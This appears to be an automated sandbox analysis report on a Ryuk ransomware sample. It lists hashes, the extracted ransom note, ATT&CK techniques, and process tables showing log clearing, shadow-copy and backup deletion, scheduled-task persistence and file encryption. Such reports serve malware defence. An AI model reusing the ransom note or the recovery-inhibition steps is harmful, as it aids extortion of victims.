ryuk | f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea

Analysis

max time kernel
150s
max time network
46s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
19-12-2022 22:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
Size

885KB
MD5

154b73d0a7aa19df12364a78b235f29f
SHA1

5e39ad8cd8f05d29b7587a876c318be5c0511dcc
SHA256

f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea
SHA512

bf32fb8e846170bb5f2c9505e5577e5d3b31f3f9a43030b5f3268d66f3d11f3c983b231742f0d51488c4a288639c0d9e91a911fec0b016d54047e582695a98e0
SSDEEP

12288:D/2O9w8wycU2JlJYqWYgeWYg955/155/0QebUlAAsjsKqgo7Rn6X:DbC8tUlqgQKUKRjsKqgQN6

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at [email protected] or [email protected] You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

[email protected]

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
1524	wevtutil.exe
2000	wevtutil.exe
564	wevtutil.exe
1700	wevtutil.exe
612	wevtutil.exe
1880	wevtutil.exe
1420	wevtutil.exe
2028	wevtutil.exe
1720	wevtutil.exe
1540	wevtutil.exe
224	wevtutil.exe
1880	wevtutil.exe
216	wevtutil.exe
1044	wevtutil.exe
1224	wevtutil.exe
816	wevtutil.exe
1240	wevtutil.exe
676	wevtutil.exe
612	wevtutil.exe
1532	wevtutil.exe
616	wevtutil.exe
1044	wevtutil.exe
1476	wevtutil.exe
960	wevtutil.exe
592	wevtutil.exe
1088	wevtutil.exe
324	wevtutil.exe
964	wevtutil.exe
2032	wevtutil.exe
308	wevtutil.exe
304	wevtutil.exe
2000	wevtutil.exe
520	wevtutil.exe
1980	wevtutil.exe
1532	wevtutil.exe
1688	wevtutil.exe
592	wevtutil.exe
212	wevtutil.exe
576	wevtutil.exe
1028	wevtutil.exe
780	wevtutil.exe
220	wevtutil.exe
112	wevtutil.exe
432	wevtutil.exe
1252	wevtutil.exe
1976	wevtutil.exe
1672	wevtutil.exe
240	wevtutil.exe
1524	wevtutil.exe
1028	wevtutil.exe
2028	wevtutil.exe
976	wevtutil.exe
468	wevtutil.exe
1252	wevtutil.exe
1328	wevtutil.exe
560	wevtutil.exe
2024	wevtutil.exe
1252	wevtutil.exe
1868	wevtutil.exe
1224	wevtutil.exe
816	wevtutil.exe
1628	wevtutil.exe
1676	wevtutil.exe
1440	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1700 bcdedit.exe
1664 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

552 wbadmin.exe
Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

pid	process
1700	bcdedit.exe
1664	bcdedit.exe

pid	process
552	wbadmin.exe

Drops startup file 3 IoCs

Processes:

cmd.exeattrib.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

1904 icacls.exe

pid	process
1904	icacls.exe

Enumerates connected drives 3 TTPs 42 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exewevtutil.exewevtutil.exevssadmin.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	ioc	process
File opened (read-only)	\??\I:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\M:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\A:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\W:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\H:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\V:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\e:	wevtutil.exe
File opened (read-only)	\??\f:	wevtutil.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\S:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\U:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\Y:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\F:	wevtutil.exe
File opened (read-only)	\??\N:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\D:	wevtutil.exe
File opened (read-only)	\??\E:	wevtutil.exe
File opened (read-only)	\??\g:	wevtutil.exe
File opened (read-only)	\??\h:	wevtutil.exe
File opened (read-only)	\??\h:	wevtutil.exe
File opened (read-only)	\??\Q:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\B:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\R:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	wevtutil.exe
File opened (read-only)	\??\L:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\F:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\e:	wevtutil.exe
File opened (read-only)	\??\g:	wevtutil.exe
File opened (read-only)	\??\E:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\K:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\O:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\P:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\D:	wevtutil.exe
File opened (read-only)	\??\E:	wevtutil.exe
File opened (read-only)	\??\J:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\T:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\X:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\Z:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\G:	wevtutil.exe
File opened (read-only)	\??\H:	wevtutil.exe
File opened (read-only)	\??\H:	wevtutil.exe
File opened (read-only)	\??\G:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe

Drops file in Program Files directory 64 IoCs

Processes:

f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.el_2.2.0.v201303151357.jar.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR18F.GIF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15171_.GIF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-uisupport.xml.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SLATE\SLATE.ELM.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Slipstream.eftx.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\logging.properties.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Easter.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\BG_ADOBE.GIF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00669_.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Trek.eftx.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Apex.thmx.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME40.CSS.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\MMHMM.WAV.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_ON.GIF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\JNGLE_01.MID.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742G.GIF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02055_.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02158_.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.RuntimeUi.xml.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng.txt.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107350.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\SKY.ELM.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server-15.jar.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGTOC.DPV.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185842.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01473_.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PICCAP98.POC.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115840.GIF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\PublicFunctions.js.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15136_.GIF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14793_.GIF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImagesMask.bmp.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SUMIPNTG\SUMIPNTG.ELM.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02407_.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Toronto.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Argentina\La_Rioja.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00152_.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15272_.GIF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21504_.GIF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OLMAPI32.DLL.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\LICENSE.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jre7\lib\deploy\messages_de.properties.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\resources.jar.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105368.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD15184_.GIF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.properties.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe Root Certificate.cer.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196364.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPrintTemplateRTL.html.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Argentina\Tucuman.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBE7INTL.DLL.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\ACEEXCL.DLL.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0199549.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\COUPON.POC.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe

Drops file in Windows directory 5 IoCs

Processes:

f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exewbadmin.exe

description	ioc	process
File created	C:\Windows\RyukReadMe.txt	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File created	C:\Windows\hrmlog1	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

1724 sc.exe
1988 sc.exe
1304 sc.exe
1460 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

564 schtasks.exe
1904 schtasks.exe
848 schtasks.exe
2032 schtasks.exe
2000 schtasks.exe

pid	process
1724	sc.exe
1988	sc.exe
1304	sc.exe
1460	sc.exe

pid	process
564	schtasks.exe
1904	schtasks.exe
848	schtasks.exe
2032	schtasks.exe
2000	schtasks.exe

Interacts with shadow copies 2 TTPs 15 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
1768	vssadmin.exe
304	vssadmin.exe
688	vssadmin.exe
1476	vssadmin.exe
2032	vssadmin.exe
1172	vssadmin.exe
1932	vssadmin.exe
304	vssadmin.exe
236	vssadmin.exe
1252	vssadmin.exe
1076	vssadmin.exe
1676	vssadmin.exe
840	vssadmin.exe
1964	vssadmin.exe
1240	vssadmin.exe

Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1884 taskkill.exe
1532 taskkill.exe
1540 taskkill.exe
960 taskkill.exe
1448 taskkill.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

1624 NOTEPAD.EXE
Runs net.exe

pid	process
1884	taskkill.exe
1532	taskkill.exe
1540	taskkill.exe
960	taskkill.exe
1448	taskkill.exe

pid	process
1624	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe

pid	process
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
